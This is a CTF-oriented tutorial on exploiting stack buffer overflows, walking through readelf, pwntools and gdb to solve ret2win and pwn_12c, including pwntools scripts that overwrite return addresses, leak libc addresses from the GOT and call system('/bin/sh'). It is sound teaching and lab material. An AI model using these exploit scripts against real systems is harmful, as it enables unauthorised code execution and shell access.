How2BufferFlow

July 16th 2021

How 2 buffer(over)flow

A detailed step for step guide on how to exploit simple buffer overflows and more.

Examples will include these binaries:

ret2win (Easy; basic bufferoverflow)
pwn_12c (Easy & Medium, 2 challs in one)
ropncall (Medium; Ropping required)
Librarian 3 (Hard; longer exploit)

And there's also some more information:

Leo's lecture about it

Structure of ELFs and some data gathering

This is a long explanation what a cool little tool does, to see what that does, just go to the next section.

So before we can actually exploit something we need to see what we can use. For this the readelf tool from binutils is a great tool.

If we run readelf -l <binary> on any of the binaries provided we will get a short summary of all the segments which are important when we start the program. There are different types, but for now all we care about are the "LOAD" segments. We can read the Offset in the file (in bytes), the Virtual address the program should be loaded to, the size of the section and which flags the segment will have once it's loaded.

The most important segments are the ones with an "E" in the flags, since those are the segements with the code. If there's a segement with "RWE", then you don't ensure that nobody can overwrite the code you're executing or that nobody executes data as code (Generally W^X is enabled though).

Another thing you might see when doing that is that the Virtual Address of a segment is zero and the next one is just the size if the first, the next is at address of the sum of the previous segments, etc. This indicates that the binary was compiled with the -fPIE (or equivalent) switch, which makes the binary loadable at any address, as long as all the things stay at the same offsets (Position Independent Code). This makes exploitation considerably harder, since we don't know at which address the binary was loaded (Address Space Layout Randomization will put it at a random address)

Intro to pwntools

Run pip install pwntools to get the pwn tools you need to exploit all the binaries (seriously pwntools is great). Make sure you install it in such a way that the installed binaries are in your path (Easiest to do if you install with root; if they're not in your path pip will warn you about that after installing)

Now if you get a pwn challenge all you need to do is to run pwn template --host remote --port port binary > exploit.py and then you have a nice template to work with (You can leave the --host and --port if you don't have a remote; check the help page of pwn template for more information).

In the template you will also have a comment indicating some things we manually deciphered from readelf before: namely the PIE status and if there's no PIE the base address. Then also if there's RELocation Read Only (RELRO), the NX bit (Not executable (data), which would be disabled if there's a RWX segment), and also if there's a stack canary. The stack canary is simply a random integer at the end of the stack but before the return address, such that a buffer overflow could be detected if the value set at the beginning of the function was modified during the function.

Now you can run that template with some flags: GDB will start a gdb attached to the program, LOCAL will launch it locally (Default is on the server if you have specified a host and a port), DEBUG will print all the bytes that are sent and received, NOASLR will (try to) disable ASLR and make the addresses predictable and there are some more, but these are the most important ones.

Now let's look at what we need to do in the code to interact with the binary. There should be a short example of what you can do. All the interactions with the binary will be done with the io object. To log you can use info("x is: 0x%x", number) or debug with the same printf-like syntax (Or just use print, I don't care)

The io object is a "Tube" which just means that it's a wrapper around the binary such that no matter how you execute it, the interaction will be the same. There a few interaction methods implemented, those are via sockets (remote), subprocesses (local) and some more obscure ones like SSH and Serial. But in all cases after getting the io object, the functions will be the same.

Sending

To send you can simply do io.send(data) or io.sendline(data) if you want to have the newline appended automatically.

Receiving

To read you can do io.recv(num) for a specific number of bytes io.recvline() to read a line, io.recvuntil("waiting_for") which will wait until the binary prints "waiting_for". (In the latter both bytes and strings are accepted).

Interacting

Once you got a shell or if you want to simply play with the binary, you can call io.interactive() which will hand over the io to the stdin/stdout for you to interact with

Packing / Unpacking ints

To send 32 or 64 bit integers as raw bytes you have the methods p32 and p64, to convert a set of 4, or 8, bytes into a 32, or 64, bit integer you have u32 and u64. Make sure the buffers are the correct lengths when unpacking.

cyclic

There's a neat little function called cyclic, it takes an integer parameter and spits out that many bytes. If you have four bytes of that pattern, you can identify at what position those bytes were with the function cyclic_find("...."), which is especially useful for buffer overflows and detecting how many bytes you have to overflow (I mean you can always just calculate it from the stack pointer in the disassembly, up to you)

fit

fit is another cool function which takes a dictionary and makes the values fit at the position (key), so for the dict {0: "123", 6: "456", 12: "1111111"}, fit will produce b'123aba456aaa1111111'. The spaces where there's nothing are filled with the same pattern as cyclic produces, inputs are either strings or byte objects but output is always a byte object.

shellcraft & rop

Useful for shellcoding and ropping, but I'll be doing everything manually in this guide, since we're here to learn how2bufferflow, not how the use pwntools (But seriously, you should look into them too, makes ropping easier)

The exe object

The template automatically made an object exe for you, with this you can access symbols, the got and the plt very easily. Even if the binary has no symbols, if it is compiled dynamically, then the got and plt will contain functions with names (Since they are often dynamically loaded).

To get the offset/address of a symbol you can do exe.sym["name"], for example if you want the address to the main function you can do exe.sym["main"]. Alternatively you can do exe.sym.main if you like that syntax more. The same can be done with the plt/got tables. Just do exe.got["puts"] to get the address for puts in the got and exe.plt["puts"] to get the address/offset of puts in the plt To get the address to the start of the bss you can do exe.bss()

Now that I told you how to get those values, what are they for? Well, the Procedure Linking Table contains functions to lazily load functions (meaning you only load the function when you execute it for the first time). If the function has already been loaded then the Global Offset Table holds the pointer to the function and the plt function just jumps to that pointer. The bss is just uninitialized data - so in a read/write segment - and in programming languages this contains globals / static variables which are accessible over the entire program but which are not malloced.

So if you want to call a function from a library, you do that over the plt, if you want the pointer of a library function you look in the got (Useful for leaking libc addresses :P)

The first bufferflow [ret2win]

First things first, open the file in any disassembler/decompiler (Doesn't really matter if you use ghidra, ida, binary ninja, cutter, ...) You just have to find the main() function (be aware, binary ninja optimizes stuff out here!) You should get something like this: (Ghidra output of main)

undefined8 main(void)

{
  undefined local_24 [12];
  undefined local_18 [12];
  uint local_c;

  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  local_c = 0xdeadbeef;
  puts("Casual stroll wont do, step somewhere specific");
  __isoc99_scanf("%20s",local_18);
  if (local_c == 0x1337c0d3) {
    puts("Check");
    __isoc99_scanf("%44s",local_24);
  }
  return 0;
}

so we see that we first read 20 chars into local_18 and if another variable (which is after local_18) has a certain value we do another read with more characters. If you just try to input 20 characters into the binary you'll see that it just exists, so first we need to make sure we get it to crash (by overwriting the return address). To do so, we first need to overflow the value in local_c, so we do

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.interactive()

and voilà, we get into the if statement. Why we chose 12 should be clear from the stack layout (The local_c is directly after the local_18, the size of which being 12, so just overflow it). Next we want to figure out if we crash, so we extend the exploit to this:

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(cyclic(44)) # we read 44 chars in the second scanf
io.interactive()

and for sure we get a SIGSEGV, so time to add GDB to the parameters and investigate. If you don't have any extensions to help you debugging installed in gdb, I can suggest gdb-peda, pwndbg or gef.

If you get an error that you need to set "terminal", then you need to first start tmux (such that the script can multiplex the output and gdb in the same terminal window). If you don't like the splitting top and bottom, but would rather have left and right, then just add context.terminal = ["tmux", "split", "-h"] into your exploit script (Before calling io=start())

Next, just enter a c into gdb to continue execution and wait for it to trigger the segfault. It should stop at a ret instruction and you should see the return address on the stack, which should be "jaaakaaa" if you read it as a string.

Now we just have to find the offset we need to write the return address we want. Oh lucky us that there is cyclic_find, so open an interactive python shell, from pwn import * and do cyclic_find("jaaa") to get the offset of 36. The challenge name indicates that we should return to the function called "win", so let's just do that. We know that there's no PIE (thanks pwntools), so all addresses are fixed, so we just take the address of the win function with the symbols of the file.

So we update our exploit like this:

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(fit({36: p64(exe.sym.win) }))
io.interactive()

the fit function will make our payload such that the 64-bit return address will be at offset 36. And we're done and get the flag :)

The second bufferflow [pwn_12c easy part]

Well, template and ghidra go brrrr. Again the goal is to call the win function, this time we have to pass some arguments too though. Luckily this time we have a gets, which means we're not limited by character counts.

So first we need to determine the length of stack variables

io = start()
io.sendline(cyclic(100)) # should well overflow anything
io.interactive()

again, start with GDB and continue until you get the segfault, look at the top of the stack (or the current EIP/RIP value if it tried to jump there) and search for the first four characters' offset in the cyclic pattern. In our case it jumped to the address, before realizing that there's nothing there. So in EIP we have 0x6161616e and peda kindly tells us that that is "naaa". Thus our offset is 52.

An alternative to this dynamic approach would be to compute the offset based on the RBP/EBP inside the function, so in this example, if we look at the disassembly we see that it does 08049273 8d 45 d0 LEA EAX=>local_34,[EBP + -0x30] to load the address of the buffer for the gets call. So we could just compute the return address to be at 0x34 == 52 (Since there's the old ebp before the return value, and the EBP points to that old EBP value)

So now let's debug it with this exploit: (Launch with GDB and set a breakpoint in win, by typing break win before doing c)

io = start()
payload = p32(exe.sym.win) + cyclic(20)
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()

Once there, single step (By doing ni) to the first compare. There we can inspect the value of the argument by doing x/wx $ebp+8, which should be 0xdeadbeef. We see that that is 0x61616162. Interesting, let's continue with the second parameter at $ebp+12 and we see that it's 0x61616163. So we see that our arguments are just the part after the return address and another four bytes on the stack (For 32 bit programs at least), so let's just put that into our payload:

io = start()
payload = p32(exe.sym.win) + b"aaaa" + p32(0xdeadbeef) + p32(0xba5eba11) + p32(0x1337c0de)
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()

and we pass all the checks, hooray, 1/2 done with this challenge.

The shell exploit [pwn_12c medium part]

This time we need to exploit the same binary as before, but we need to get a shell, so launch "/bin/sh" or a similar program. We already know the correct offset, so we just need to adjust our payload to do the correct thing. We can trivially call system by calling it in the .plt section. The hard part is to get a string "/bin/sh" into the program and then a pointer to that on the stack (Since we want to execute that). First I'll show the intended version since that's harder than my solution, so first we need to leak the libc because there are "/bin/sh" strings in libc, but at different addresses for each version.

As I said to call a function we call it in the plt and to get the address we look into the got, so to leak a address from libc we can simply call the libc function puts which the program uses (Thus the resolved address is certainly in the got) and then pass it a got address.

io = start()
payload = p32(exe.plt.puts) + b"aaaa" + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4)) 
info("Got puts address: %x", x)
io.interactive()

with this we can leak a single address, but to know which version of libc the remote has, we need more, luckily there's 4 bytes of return address left which is not an argument, so we interleave two calls to puts with different got entries.

io = start()
payload = p32(exe.plt.puts) + p32(exe.plt.puts) + p32(exe.got.puts) + p32(exe.got.gets)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4)) 
info("Got puts address: %x", x)
io.recvline() # clear the line from the puts
x = u32(io.recv(4)) 
info("Got gets address: %x", x)
io.recvline()
io.interactive()

Make sure you use functions which are loaded into the got (aka they were called at least once). When you get two functions, you can use the libc db to find out which version of libc the remote server is running. on the website it even has useful exploitation information, like str_bin_sh 0x195b84, which means for us that there's a "/bin/sh" at offset 0x195b84 in libc

Now our final exploit can finally begin to take form. First we need to leak a single address from libc but then we need to input something again to input the address to the /bin/sh string with correct libc base address. this is easily done by just calling the "run" function again and doing the exploit again, so first we leak the libc address like earlier, but call run() instead of segfaulting:

io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4)) 
info("Got puts address: %x", x)

io.interactive()

Now we have the base address, the offset to a /bin/sh string, so let's just combine it right away:

io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4)) 
info("Got puts address: %x", x)
payload = p32(exe.plt.system) + b"aaaa" + p32(x + 0x195b84 - 0x714c0) # /bin/sh string inside libc => param for system()
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()

the offsets 0x714c0 and 0x195b84 are both taken straight from libc.rip, we need to subtract the puts address to get the base address and then add the str_bin_sh offset to get the string address. And that's it, we got a shell (At least I get one on my machine, since those offsets are for my libc, they most likely will differ for your system!)

< DH MITM | ImaginaryCTF Round 11 Writeup >